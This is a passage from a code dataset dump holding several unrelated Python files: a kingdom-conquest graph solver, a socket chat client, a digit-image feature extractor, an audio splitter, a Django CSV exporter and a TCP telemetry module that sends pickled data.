!= 0:\r\n count += adjacency_matrix[i][j] #add the distance to neighbor j\r\n count += adjacency_matrix[j][j] #add the conquer cost for neighbor j\r\n time_saved[i] = count\r\n return time_saved\r\n\r\ndef update_timesaved(time_saved, just_conquered, adjacency_matrix, owned_kingdoms):\r\n # work on time_saved: go through adjacency mtx and for kingdom i, add on all values for mtx[i][j] where j != i and j != 'x'\r\n print(just_conquered)\r\n for i in range(len(adjacency_matrix)): #for each kingdom i\r\n if i != just_conquered and adjacency_matrix[i][just_conquered] != 0 and just_conquered not in owned_kingdoms: #if kingdom i has just_conquered as a neighbor\r\n # print(i)\r\n # print(adjacency_matrix[i][just_conquered]) \r\n # print(adjacency_matrix[just_conquered][just_conquered]) \r\n time_saved[i] -= adjacency_matrix[i][just_conquered] #subtract distance from i to just_conquered\r\n time_saved[i] -= adjacency_matrix[just_conquered][just_conquered] #subtract conquer cost of just_conquered\r\n for j in range(len(adjacency_matrix)): #for each kingdom j\r\n if i != j and j != just_conquered and adjacency_matrix[i][j] != 0 and i not in owned_kingdoms: #if j is a neighbor of the neighbor i\r\n time_saved[j] -= adjacency_matrix[i][j] #subtract distance from i to j\r\n time_saved[j] -= adjacency_matrix[j][j] #subtract conquer cost of j\r\n return time_saved\r\n\r\ndef update_totalcost(total_cost, current_kingdom, adjacency_matrix, shortest_distances):\r\n # work on total_cost: go through johnson's matrix. 
\r\n for i in range(len(total_cost)):\r\n total_cost[i] = shortest_distances[current_kingdom][i] + adjacency_matrix[i][i]\r\n # to update: just update current_kingdom and rerun this code\r\n return total_cost\r\n\r\ndef update_values(values, time_saved, total_cost):\r\n # work on values: \r\n weight = 1 # CHANGE THIS VALUE\r\n values = [max(time_saved[i] - (weight * total_cost[i]), 0) for i in range(len(values))]\r\n #\r\n return values\r\n\r\ndef find_neighbors(current, adjacency_matrix):\r\n neighbors = []\r\n for i in range(len(adjacency_matrix)):\r\n if i != current and adjacency_matrix[i][current] != 0:\r\n neighbors.append(i)\r\n return neighbors\r\n\r\ndef load_adjacency_matrix (adjacency_matrix, G): \r\n result = [[0 for i in range(len(adjacency_matrix))] for j in range(len(adjacency_matrix))] \r\n d = nx.johnson(G)\r\n \r\n for i in range(len(adjacency_matrix)):\r\n for j in range(len(adjacency_matrix)):\r\n if(i == j):\r\n result[i][j] = []\r\n else:\r\n result[i][j] = d[i][j]\r\n \r\n return result\r\n \r\ndef calc_path_length(adjacency_matrix, johnson) :\r\n total = 0\r\n path_lengths = [[0 for j in range(len(adjacency_matrix))] for i in range(len(adjacency_matrix))] \r\n\r\n for i in range(len(adjacency_matrix)):\r\n for j in range(len(adjacency_matrix)):\r\n total = 0 \r\n current_path = johnson[i][j]\r\n for count in range(len(current_path) - 1):\r\n total += adjacency_matrix[current_path[count]][current_path[count+1]]\r\n path_lengths[i][j] = total\r\n return path_lengths\r\n\r\ndef solve(list_of_kingdom_names, starting_kingdom, adjacency_matrix, params=[]):\r\n \"\"\"\r\n Write your algorithm here.\r\n Input:\r\n list_of_kingdom_names: An list of kingdom names such that node i of the graph corresponds to name index i in the list\r\n starting_kingdom: The name of the starting kingdom for the walk\r\n adjacency_matrix: The adjacency matrix from the input file\r\n Output:\r\n Return 2 things. 
The first is a list of kingdoms representing the walk, and the second is the set of kingdoms that are conquered\r\n \"\"\" \r\n\r\n # initialize data structures\r\n n = len(list_of_kingdom_names)\r\n time_saved = [0] * n\r\n total_cost = [0] * n\r\n values = [0] * n\r\n current_kingdom = list_of_kingdom_names.index(starting_kingdom)\r\n\r\n walk = [current_kingdom]\r\n walk_length = 0\r\n kingdoms = set()\r\n owned_kingdoms = set()\r\n\r\n # USE JOHNSON'S ALG HERE: we need shortest_paths = output of johnson | shortest_distances = path lengths for paths\r\n tempadj = adjacency_matrix\r\n for i in range(len(adjacency_matrix)):\r\n for j in range(len(adjacency_matrix)):\r\n if tempadj[i][j] == 'x':\r\n tempadj[i][j] = 0\r\n\r\n npmtx = np.asarray(tempadj)\r\n G = nx.convert_matrix.from_numpy_matrix(npmtx)\r\n G = G.to_undirected()\r\n\r\n shortest_paths = load_adjacency_matrix(adjacency_matrix, G);\r\n shortest_distances = calc_path_length(adjacency_matrix, shortest_paths)\r\n ###### \r\n\r\n time_saved = init_timesaved(time_saved, adjacency_matrix)\r\n total_cost = update_totalcost(total_cost, current_kingdom, adjacency_matrix, shortest_distances)\r\n values = update_values(values, time_saved, total_cost)\r\n\r\n\r\n #count=0\r\n while len(owned_kingdoms) != len(list_of_kingdom_names):\r\n if (max(values) != 0):\r\n target = np.argmax(np.asarray(values)) \r\n else:\r\n target = np.argmax(np.asarray(time_saved))\r\n\r\n # calculate stuff\r\n path = shortest_paths[current_kingdom][target]\r\n distance = shortest_distances[current_kingdom][target]\r\n\r\n # conquer it\r\n walk.extend(path[1:])\r\n walk_length += (distance + adjacency_matrix[target][target])\r\n kingdoms.add(target)\r\n current_kingdom = target\r\n time_saved[target] = 0\r\n neighbors = find_neighbors(target, adjacency_matrix)\r\n for e in neighbors:\r\n owned_kingdoms.add(e)\r\n time_saved = update_timesaved(time_saved, target, adjacency_matrix, owned_kingdoms)\r\n total_cost = update_totalcost(total_cost, current_kingdom, adjacency_matrix, shortest_distances)\r\n values = update_values(values, time_saved, total_cost)\r\n\r\n\r\n if walk[len(walk)-1] != list_of_kingdom_names.index(starting_kingdom):\r\n walk.append(list_of_kingdom_names.index(starting_kingdom))\r\n\r\n closed_walk = []\r\n conquered_kingdoms = set()\r\n\r\n for k in walk:\r\n closed_walk.append(list_of_kingdom_names[k])\r\n\r\n for k in kingdoms:\r\n conquered_kingdoms.add(list_of_kingdom_names[k])\r\n\r\n\r\n return closed_walk,conquered_kingdoms\r\n\r\n\r\n \r\n\r\n\"\"\"\r\n======================================================================\r\n No need to change any code below this line\r\n======================================================================\r\n\"\"\"\r\n\r\n\r\ndef solve_from_file(input_file, output_directory, params=[]):\r\n print('Processing', input_file)\r\n \r\n input_data = utils.read_file(input_file)\r\n number_of_kingdoms, list_of_kingdom_names, starting_kingdom, adjacency_matrix = data_parser(input_data)\r\n closed_walk, conquered_kingdoms = solve(list_of_kingdom_names, starting_kingdom, adjacency_matrix, params=params)\r\n\r\n basename, filename = os.path.split(input_file)\r\n output_filename = utils.input_to_output(filename)\r\n output_file = f'{output_directory}/{output_filename}'\r\n if not os.path.exists(output_directory):\r\n os.makedirs(output_directory)\r\n utils.write_data_to_file(output_file, closed_walk, ' ')\r\n utils.write_to_file(output_file, '\\n', append=True)\r\n utils.write_data_to_file(output_file, 
conquered_kingdoms, ' ', append=True)\r\n\r\n\r\ndef solve_all(input_directory, output_directory, params=[]):\r\n input_files = utils.get_files_with_extension(input_directory, 'in')\r\n\r\n for input_file in input_files:\r\n solve_from_file(input_file, output_directory, params=params)\r\n\r\n\r\nif __name__==\"__main__\":\r\n parser = argparse.ArgumentParser(description='Parsing arguments')\r\n parser.add_argument('--all', action='store_true', help='If specified, the solver is run on all files in the input directory. Else, it is run on just the given input file')\r\n parser.add_argument('input', type=str, help='The path to the input file or directory')\r\n parser.add_argument('output_directory', type=str, nargs='?', default='.', help='The path to the directory where the output should be written')\r\n parser.add_argument('params', nargs=argparse.REMAINDER, help='Extra arguments passed in')\r\n args = parser.parse_args()\r\n output_directory = args.output_directory\r\n if args.all:\r\n input_directory = args.input\r\n solve_all(input_directory, output_directory, params=args.params)\r\n else:\r\n input_file = args.input\r\n solve_from_file(input_file, output_directory, params=args.params)","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"140191864","text":"import select\nimport socket\nimport sys\n\nHOST = '127.0.0.1'\nPORT = 8001\n\n\ndef prompt():\n sys.stdout.write('-> ')\n sys.stdout.flush()\n\n\nif __name__ == \"__main__\":\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(2)\n\n try:\n s.connect((HOST, PORT))\n except Exception:\n sys.exit()\n\n while 1:\n socket_list = [sys.stdin, s]\n\n read_sockets, _, _ = select.select(socket_list, [], [])\n\n for sock in read_sockets:\n if sock == s:\n data = sock.recv(4096).decode()\n if not data:\n sys.exit()\n else:\n sys.stdout.write(f\"\\r{data}\")\n prompt()\n\n else:\n msg = sys.stdin.readline()\n s.send(msg.encode())\n prompt()\n","sub_path":"lab1/chat/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175168482","text":"'''\n\tFile: DigitRecognizer.py\n\t\n\tProject starting file\n\tAuthors: Michael Pruitt (mkp3632), Samuel Kirschbaum (sxk1869), Georgia Partyka( gap8240), Andrew Scialla (axs7942)\n'''\n\nimport math\nimport numpy\nimport sys\nfrom Cluster import *\nfrom FLD import *\nfrom NaiveBayes import *\n\n# Image constants\nWIDTH = 28\nHEIGHT = 28\nAVAL = \"AVal\"\n\nLENGTH = WIDTH * HEIGHT\n\n# Normalization constants\nMARK_THRESH = 1\nMARK = \"#\"\nBLANK = \".\"\n\n# I/O constants\nFEATURE_FILE = \"features.csv\"\n\nclass Image():\n\t\"\"\"\n\t\tClass to hold an image and all its features\n\t\tFields\n\t\t\tid\t\t\t- the image's unique id\n\t\t\torig \t\t- the original image with values 0-255\n\t\t\tnorm \t\t- normalized image with MARK or BLANK values\n\t\t\tfeatures\t- a dictionary of name, value pairs of features\n\t\t\tactual\t\t- the actual value from training data\n\t\t\tprediction\t- the predicted value\n\t\"\"\"\n\t\n\t# Static id counter\n\tid = 0\n\t\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t\tInitializes an empty image with a unique id (starts from 0)\n\t\t\"\"\"\n\t\tself.id = Image.id\n\t\tImage.id += 1\n\t\t\n\t\tself.orig = list()\n\t\tself.norm = list()\n\t\t\n\t\tself.features = {}\n\t\tself.actual = -1\n\t\tself.prediction = 
-1\n\t\t\t\n\tdef __str__(self):\n\t\t\"\"\"\n\t\t\tReturns a string representation of the image, along with its id and\n\t\t\tlist of features and values\n\t\t\"\"\"\n\t\tresult = \"Id: %i\\nImage:\\n\"%(self.id)\n\t\t\n\t\t# Image\n\t\tfor r in range(len(self.norm)):\n\t\t\tfor c in range(len(self.norm[0])):\n\t\t\t\tresult += str(self.norm[r][c]) + ' '\n\t\t\tresult += '\\n'\n\t\t\t\n\t\t# Features\n\t\tresult += \"Features:\\n\"\n\t\tfor key in self.features:\n\t\t\tresult += \"\\t%s: %s\\n\"%(key, str(self.features[key]))\n\t\t\n\t\treturn result\n\n\tdef toCsvString(self):\n\t\t\"\"\"\n\t\t\tReturns a string containing the id and feature values sorted\n\t\t\tby feature name alphabetically in comma-separated format.\n\t\t\"\"\"\n\t\tresult = str(self.id)\n\t\t\t\n\t\t# Features\n\t\tfor key in sorted(self.features):\n\t\t\tresult += ',' + str(self.features[key])\n\t\t\n\t\treturn result\n\t\t\n\tdef featureList(self):\n\t\t\"\"\"\n\t\t\tReturns a string containing ID and feature names sorted\n\t\t\talphabetically in comma-separated format.\n\t\t\"\"\"\n\t\tresult = \"ID\"\n\t\t\t\n\t\t# Features\n\t\tfor key in sorted(self.features):\n\t\t\tresult += ',' + key\n\t\t\n\t\treturn result\n\t\n\tdef calculateFeatures(self):\n\t\t\"\"\"\n\t\t\tCalculates the feature values for this image. Must have image data.\n\t\t\"\"\"\n\t\tif len(self.norm) < HEIGHT or len(self.norm[0]) < WIDTH:\n\t\t\treturn None\n\t\t\t\n\t\tself.calculateWtoH()\n\t\tself.calculateCorners()\n\t\tself.calculateDistFromCenter()\n\t\tself.calculateTotalMarks()\n\t\tself.features[AVAL] = self.actual\n\t\n\tdef calculateCorners(self):\n\t\t\"\"\"\n\t\t\tCalculates the Manhattan distance from each corner to the nearest\n\t\t\tmarked pixel\n\t\t\tAuthor : Georgia\n\t\n\t\ttopLeft \t= [0, 0]\n\t\ttopRight \t= [0, WIDTH-1]\n\t\tbotLeft \t= [HEIGHT -1, 0]\n\t\tbotRight \t= [HEIGHT -1, WIDTH-1]\n\t\t\"\"\"\n\t\t\n\t\tdistTopLeft = distTopRight = distBotLeft = distBotRight = 100\n\n\t\tdist = 0\n\n\t\tfor i in range(WIDTH):\n\t\t\tfor j in range(HEIGHT): \n\t\t\t\t\n\t\t\t\tif self.norm[i][j] == MARK:\n\t\t\t\t\t# top left\n\t\t\t\t\tdist = (i + j)\n\t\t\t\t\tif dist < distTopLeft:\n\t\t\t\t\t\tdistTopLeft = dist\n\t\t\t\t\t# top right\n\t\t\t\t\tdist = (((WIDTH-1) - i) + j)\n\t\t\t\t\tif dist < distTopRight:\n\t\t\t\t\t\tdistTopRight = dist\n\t\t\t\t\t# bot left\n\t\t\t\t\tdist = (i + ((HEIGHT-1) - j))\n\t\t\t\t\tif dist < distBotLeft:\n\t\t\t\t\t\tdistBotLeft = dist\n\t\t\t\t\t# bot right\n\t\t\t\t\tdist = (((WIDTH-1) - i) + ((HEIGHT-1) - j))\n\t\t\t\t\tif dist < distBotRight:\n\t\t\t\t\t\tdistBotRight = dist\n\n\t\tself.features[\"distTL\"] = distTopLeft\n\t\tself.features[\"distTR\"] = distTopRight\n\t\tself.features[\"distBL\"] = distBotLeft\n\t\tself.features[\"distBR\"] = distBotRight\n\t\n\tdef calculateDistFromCenter(self):\n\t\t\"\"\"\n\t\t\t Calculates the Distance from Center for the image, or the distance\n\t\t\t from the center to the point nearest the center in the image. Stores\n\t\t\t the result in the features dictionary as DistFromCenter and returns\n\t\t\t the value. &#13;
Only works if the image contains the image data.\n\t\t\t \n\t\t\t Note that center is a 2x2 block because of even pixel lengths\n\t\t\"\"\"\n\t \n\t\tshortestDist = 100000\n\t\ttempDist = -1\n\t\t\n\t\tfor c in range(HEIGHT):\n\t\t\tfor r in range(WIDTH):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\tdist1 = math.sqrt(math.pow(c - (HEIGHT/2), 2) + math.pow(r - (WIDTH/2), 2))\n\t\t\t\t\tdist2 = math.sqrt(math.pow(c - (HEIGHT/2), 2) + math.pow(r - (WIDTH/2 - 1), 2))\n\t\t\t\t\tdist3 = math.sqrt(math.pow(c - (HEIGHT/2 - 1), 2) + math.pow(r - (WIDTH/2), 2))\n\t\t\t\t\tdist4 = math.sqrt(math.pow(c - (HEIGHT/2 - 1), 2) + math.pow(r - (WIDTH/2 - 1), 2))\n\t\t\t\t\t\n\t\t\t\t\ttempDist = dist1\n\t\t\t\t\tif dist2 < tempDist:\n\t\t\t\t\t\ttempDist = dist2\n\t\t\t\t\t\t\n\t\t\t\t\tif dist3 < tempDist:\n\t\t\t\t\t\ttempDist = dist3\n\t\t\t\t\t\t\n\t\t\t\t\tif dist4 < tempDist:\n\t\t\t\t\t\ttempDist = dist4\n\t\t\t\t\t\t\n\t\t\t\t\tif tempDist < shortestDist:\n\t\t\t\t\t\tshortestDist = tempDist\n\t\t\t\t\t\n\t\tself.features[\"DistFromCenter\"] = shortestDist\n\t\treturn shortestDist\n\n\tdef calculateTotalMarks(self):\n\t\ttotalMarks = 0\n\t\tfor x in range(WIDTH):\n\t\t\tfor y in range(HEIGHT):\n\t\t\t\tif self.norm[x][y] == MARK:\n\t\t\t\t\ttotalMarks += 1\n\n\t\tself.features[\"TotalMarks\"] = totalMarks\n\t\treturn totalMarks\n \n\tdef calculateWtoH(self):\n\t\t\"\"\"\n\t\t\tCalculates the Width to height ratio for the image, storing it in\n\t\t\tthe features dictionary as WtoH and returning the value. Only works\n\t\t\tif the image contains the image data\n\t\t\"\"\"\n\t\tcol = [0, 0]\n\t\trow = [0, 0]\n\t\t\n\t\t# min col\n\t\tdone = False\n\t\tfor c in range(HEIGHT):\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tfor r in range(WIDTH):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\tcol[0] = c\n\t\t\t\t\tdone = True\n\t\t\n\t\t# max col\n\t\tdone = False\n\t\tfor c in range(HEIGHT-1, -1, -1):\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tfor r in range(WIDTH):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\tcol[1] = c\n\t\t\t\t\tdone = True\n\t\t\n\t\t# min row\n\t\tdone = False\n\t\tfor r in range(WIDTH):\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tfor c in range(HEIGHT):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\trow[0] = r\n\t\t\t\t\tdone = True\n\t\t\n\t\t# max row\n\t\tdone = False\n\t\tfor r in range(WIDTH-1, -1, -1):\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tfor c in range(HEIGHT):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\trow[1] = r\n\t\t\t\t\tdone = True\n\t\t\t\t\t\n\t\t# Get width\n\t\tresult = (col[1]-col[0]+1) / (row[1]-row[0]+1)\n\t\tself.features[\"WtoH\"] = result\n\t\treturn result\n\t\ndef to1D(row, col):\n\t'''\n\t\tConverts a row/column value to a 1 dimensional value based on WIDTH\n\t'''\n\treturn row * WIDTH + col\n\ndef main():\n\t'''\n\t\tMain program, reads in file and displays first few images to screen\n\t'''\n\timages = list()\n\t\n\t# Reads image data from file, LENGTH pixels per row each\n\tif input(\"Read new data (y/n)? \").lower()[0] == 'y':\n\t\tfilename = input(\"Input filename: \")\n\t\t\n\t\t# Get is training data. Training data has a leading value that is the\n\t\t# actual class for the image\n\t\ttrain = input(\"Training (y/n)? 
\").lower()[0] == 'y'\n\t\t\n\t\tmarkThreshold = input(\"Mark threshold 1 < 255: \")\n\n\t\timages = readFile(filename, int(markThreshold), training=train )\n\t\t\n\t\tif train:\n\t\t\timages = restrictValues(images)\n\t\t\t\n\t\t# Calculate features\n\t\tfor image in images:\n\t\t\timage.calculateFeatures()\n\telse:\n\t\timages = readFeatures(FEATURE_FILE)\n\t\t\t\n\t# Agglomerative clustering\n\tif input(\"Run agglomerative (y/n)? \").lower()[0] == 'y':\n\t\tclusters = agglomerative(images[:2000], k=20)\n\t\tfor key in clusters:\n\t\t\tcluster = clusters[key]\n\t\t\tprint(cluster)\n\t\t\tones = cluster.sums[AVAL]\n\t\t\tprint(\"1s: %i\\t0s: %i\\n\"%(ones, len(cluster.images)-ones))\n\t\n\t# Naive Bayes\n\tif input(\"Run Naive Bayes (y/n)? \").lower()[0] == 'y':\n\t\tresults = naiveBayes(images)\n\n\t# FLD\n\tif input(\"Run Fisher Linear Discriminant (y/n)? \").lower()[0] == 'y':\n\t\tfld = fisherLD(images)\n\t\n\t# View Images\n\tprint(\"Number of images:\", len(images))\n\ti = 0\n\twhile input(\"View next (y/n)? \").lower()[0] == 'y':\n\t\tprint(str(images[i]))\n\t\t\n\t\ti += 1\n\t\tif (i >= len(images)):\n\t\t\tbreak\n\t\n\t# Writes the image features to a file\n\tif input(\"Output features to file (y/n)? \").lower()[0] == 'y':\n\t\twriteToCSV(FEATURE_FILE, images)\n\t\t\ndef writeToCSV(filename, images):\n\t\"\"\"\n\t\tWrites the features of a list of images to a csv file\n\t\t\tfilename\t- the name of the file\n\t\t\timages\t\t- the list of image objects to write\n\t\"\"\"\n\t# Open and print headers\n\tf = open(filename, \"w\")\n\tprint(images[0].featureList(), file = f)\n\t\t\n\tfor image in images:\n\t\tprint(image.toCsvString(), file = f)\n\t\t\ndef readFeatures(filename):\n\t'''\n\t\tReads in a file and returns a list of image objects, these objects will\n\t\tnot have any values in the image field. 
All values are assumed to be\n\t\tfloats\n\t\t\tfilename - the file to read from\n\t'''\n\tnames = list()\n\timages = list()\n\tfirst = True\n\t\n\tfor line in open(filename):\n\t\tl = line.split(\",\")\n\t\tif first:\n\t\t\tfor i in range(len(l)):\n\t\t\t\tnames.append(l[i].strip())\n\t\t\tfirst = False\n\t\telse:\n\t\t\timages.append(Image())\n\t\t\tfor i in range(len(l)):\n\t\t\t\ttemp = float(l[i])\n\t\t\t\timages[-1].features[names[i]] = temp\n\t\t\t\n\treturn images\n\t\ndef readFile(filename, markThreshold, training=False):\n\t'''\n\t\tReads in a file and returns a list of image objects\n\t\t\tfilename - the file to read from\n\t\t\tmarkThreshold - the normalizing grayscale value\n\t\t\ttraining - true if first line of file contains value\n\t'''\n\timages = list()\n\ti = -1\n\t\n\tprint(\"Reading file...\", end='')\n\tsys.stdout.flush()\n\tfor line in open(filename):\n\t\tl = line.split(\",\")\n\t\tif l[0].isnumeric():\n\t\t\ti += 1\n\t\t\timages.append(Image())\n\t\t\tif training:\n\t\t\t\timages[i].actual = int(l[0])\n\t\t\t\n\t\t\tfor r in range(HEIGHT):\n\t\t\t\timages[i].orig.append(list())\n\t\t\t\timages[i].norm.append(list())\n\t\t\t\t\n\t\t\t\tfor c in range(WIDTH):\n\t\t\t\t\tindex = to1D(r, c)\n\t\t\t\t\tif training:\n\t\t\t\t\t\tindex += 1\n\t\t\t\t\t\n\t\t\t\t\tval = int(l[index])\n\t\t\t\t\tif int(val) > markThreshold:\n\t\t\t\t\t\timages[i].norm[r].append(MARK)\n\t\t\t\t\telse:\n\t\t\t\t\t\timages[i].norm[r].append(BLANK)\n\t\t\t\t\timages[i].orig[r].append(val)\n\t\t\t\t\t\n\tprint(\"Done\")\n\treturn images\n\ndef restrictValues(images, restriction=[0,1]):\n\t'''\n\t\tReturns subset of images whose values are in the restricted list\n\t'''\n\tsubset = list()\n\n\tfor image in images:\n\t\tif image.actual in restriction:\n\t\t\tsubset.append(image)\n\t\n\treturn subset\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"DigitRecognizer.py","file_name":"DigitRecognizer.py","file_ext":"py","file_size_in_byte":9764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"445387981","text":"import os\nfrom pathlib import Path\nimport auditok\n\n\n\ndef split_and_store(input_audio_file):\n\n input_audio=input_audio_file\n\n min_dur = 0.4 # minimum duration of a valid audio event in seconds\n max_dur = 8 # maximum duration of an event\n max_silence = 0.05 # maximum duration of tolerated continuous silence within an event\n energy_threshold = 50 # threshold of detection\n\n output_path =(\"audio_chunks_\" + \\\n \"_\" + str(min_dur) + \\\n \"_\" + str(max_dur) + \\\n \"_\" + str(max_silence) + \\\n \"_\" + str(energy_threshold))\n\n Path(output_path).mkdir(parents=True, exist_ok=True)\n\n audio_regions = auditok.split(\n input_audio,\n min_dur=min_dur, \n max_dur=max_dur, \n max_silence=max_silence, \n energy_threshold=energy_threshold\n )\n\n start_time_stamp=[]\n end_time_stamp=[]\n for i, r in enumerate(audio_regions):\n filename = r.save(os.path.join(output_path,f\"chunk{i}.wav\"))\n #print(\"region saved as: {}\".format(filename))\n start_time_stamp.append(r.meta.start)\n end_time_stamp.append(r.meta.end)\n\n\n return output_path,start_time_stamp,end_time_stamp\n ","sub_path":"generate_chunks.py","file_name":"generate_chunks.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414913057","text":"import csv\n\nOUTDATED_KEYS = 'outdated_keys'\n\n\nclass ExportModel(object):\n @staticmethod\n def as_csv(file, queryset):\n 
\"\"\"\n 'file' (string: absolute path),\n 'queryset' a Django QuerySet instance,\n 'fields' a list or tuple of field model field names (strings)\n :returns (string) path to file\n \"\"\"\n fields = ['key', 'user_id'] + queryset.first().dataset.possible_labels + [OUTDATED_KEYS]\n nr_fields = len(fields)\n outdated_keys_index = fields.index(OUTDATED_KEYS)\n with open(file, 'w+') as f:\n writer = csv.writer(f)\n writer.writerow(fields)\n for obj in queryset:\n if not obj.key:\n continue\n\n row = [''] * nr_fields\n row[0] = obj.key\n row[1] = obj.user.id\n row[outdated_keys_index] = {}\n\n for k, v in obj.data.items():\n try:\n row[fields.index(k)] = v\n except ValueError:\n row[outdated_keys_index][k] = v\n\n row = list(map(lambda x: x if x != \"\" else False, row))\n writer.writerow(row)\n path = f.name\n return path\n","sub_path":"data_model/export_models.py","file_name":"export_models.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"362705405","text":"import time\r\nimport socket\r\nimport select\r\nimport struct\r\nimport pickle\r\nimport threading\r\nimport enum\r\n\r\nimport cv2\r\n\r\nclass DataType(enum.Enum):\r\n TELEM_RGB_IMAGE = 0\r\n TELEM_DEPTH_FRAME = 1\r\n TELEM_POSITION = 2\r\n TELEM_STATUS = 3\r\n\r\nclass airTelemetry():\r\n def __init__(self, hostname=''):\r\n self.telemInterface = tcpInterface(hostname=hostname)\r\n \r\n def start(self):\r\n self.telemThread = threading.Thread(target=self.telemInterface.startServer, name='Air_Telemetry')\r\n self.telemThread.daemon = True\r\n self.telemThread.start()\r\n\r\n def stop(self):\r\n self.telemInterface.close()\r\n \r\n def connected(self):\r\n if self.telemThread.isAlive() or not self.telemInterface.running:\r\n return False\r\n \r\n return True\r\n\r\n def sendImage(self, name, img):\r\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 50]\r\n data = cv2.imencode('.jpg', img, encode_param)[1]\r\n self.sendData(name, data)\r\n\r\n def sendData(self, name, data):\r\n if not self.connected():\r\n return\r\n \r\n try:\r\n self.telemInterface.sendData((name, data))\r\n \r\n # Start listen for new connections if socket closed\r\n except (BrokenPipeError, ConnectionResetError):\r\n self.telemInterface.close()\r\n self.start()\r\n\r\n\r\nclass tcpInterface():\r\n _PORT = 50006\r\n _MAX_READ_LEN = 60000\r\n _TIMEOUT = 1\r\n\r\n def __init__(self, hostname=''):\r\n self.hostname = hostname\r\n\r\n self.sockObj = None\r\n self.conn = None\r\n\r\n self.running = False\r\n\r\n pass\r\n \r\n def _createSocket(self):\r\n self.sockObj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sockObj.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n self.sockObj.settimeout(2)\r\n\r\n def startServer(self):\r\n self.addr = (self.hostname, self._PORT)\r\n \r\n self._createSocket()\r\n self.sockObj.bind(self.addr)\r\n self.sockObj.listen()\r\n\r\n while True:\r\n # Wait for incoming connection\r\n try:\r\n self.conn, addr = self.sockObj.accept()\r\n print('Connected to: {}'.format(addr))\r\n\r\n except (BlockingIOError, socket.timeout):\r\n print('*** Waiting for connection ***')\r\n time.sleep(1)\r\n \r\n else:\r\n self.running = True\r\n return\r\n\r\n def close(self):\r\n if self.sockObj is not None:\r\n self.sockObj.close()\r\n \r\n if self.conn is not None:\r\n self.conn.close()\r\n\r\n print('*** Connection Closed ***')\r\n\r\n def startClient(self):\r\n self.addr = (self.hostname, self._PORT)\r\n\r\n while True:\r\n try:\r\n 
self._createSocket()\r\n self.sockObj.connect(self.addr)\r\n\r\n except (ConnectionRefusedError, socket.timeout):\r\n print('*** [61] Connection Refused ***')\r\n time.sleep(1)\r\n\r\n else:\r\n self.running = True\r\n print( '*** Telemetry Connected ***')\r\n return\r\n\r\n def sendData(self, data):\r\n byteData = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)\r\n self.sendByteData(byteData)\r\n\r\n def sendByteData(self, byteData):\r\n try:\r\n writable = select.select([], [self.conn], [], self._TIMEOUT)[1]\r\n\r\n for conn in writable:\r\n msg = b'$' + struct.pack('>I', len(byteData)) + b':' + byteData\r\n conn.sendall(msg)\r\n\r\n except ValueError as e:\r\n if self.conn.fileno() == -1:\r\n raise BrokenPipeError\r\n else:\r\n print(e)\r\n\r\n except BrokenPipeError:\r\n self.conn.close()\r\n\r\n def readMsg(self):\r\n try:\r\n readable = select.select([self.sockObj], [], [], self._TIMEOUT)[0]\r\n\r\n for conn in readable:\r\n # Syncronize stream\r\n msg = conn.recv(1)\r\n while msg != b'$':\r\n msg = conn.recv(1)\r\n\r\n if msg == b'':\r\n return None\r\n\r\n # Get message length\r\n msg_len = struct.unpack('>I', conn.recv(4))[0]\r\n\r\n # Wait for all data to be returned\r\n if conn.recv(1) == b':':\r\n msg = b''\r\n while len(msg) < msg_len:\r\n\r\n bytesIn = msg_len - len(msg)\r\n if bytesIn > self._MAX_READ_LEN:\r\n bytesIn = self._MAX_READ_LEN\r\n\r\n try:\r\n msg += conn.recv(bytesIn)\r\n except BlockingIOError:\r\n time.sleep(0.1)\r\n \r\n data = pickle.loads(msg)\r\n return data\r\n\r\n except (ValueError):\r\n if self.sockObj.fileno() == -1:\r\n raise BrokenPipeError\r\n\r\n except (ConnectionResetError, socket.timeout):\r\n print( '*** Socket Closed ***' )\r\n self.close()\r\n\r\n return None\r\n\r\n\r\n#if __name__ == \"__main__\":\r\n# import threading\r\n\r\n# remoteTelem = airTelemetry()\r\n# remoteTelem.start()\r\n\r\n# while not remoteTelem.connected():\r\n# time.sleep(1)\r\n\r\n# testImage = cv2.imread('/Users/freddiesherratt/Desktop/ERL_SmartCities_2019/modules/test.jpg', 0)\r\n\r\n# totalTime = 0\r\n# loops = 5\r\n# for i in range(loops):\r\n# print(i+1)\r\n# startTime = time.time()\r\n# remoteTelem.sendImage(testImage)\r\n# totalTime += time.time() - startTime\r\n\r\n# print(totalTime/loops)\r\n\r\n# remoteTelem.stop()\r\n","sub_path":"Telemetry.py","file_name":"Telemetry.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"285123332","text":"__author__ = 'anonymous'\nfrom loader import Loader\nimport json\nclass ConfigLoader(Loader):\n\n def __init__(self,path,override=None):\n super().__init__(path,override)\n\n\n def get(self,val):\n if not val:\n raise ValueError(\"String seems to be empty\")\n path = [i for i in val.split('.') if i.strip()]\n config = 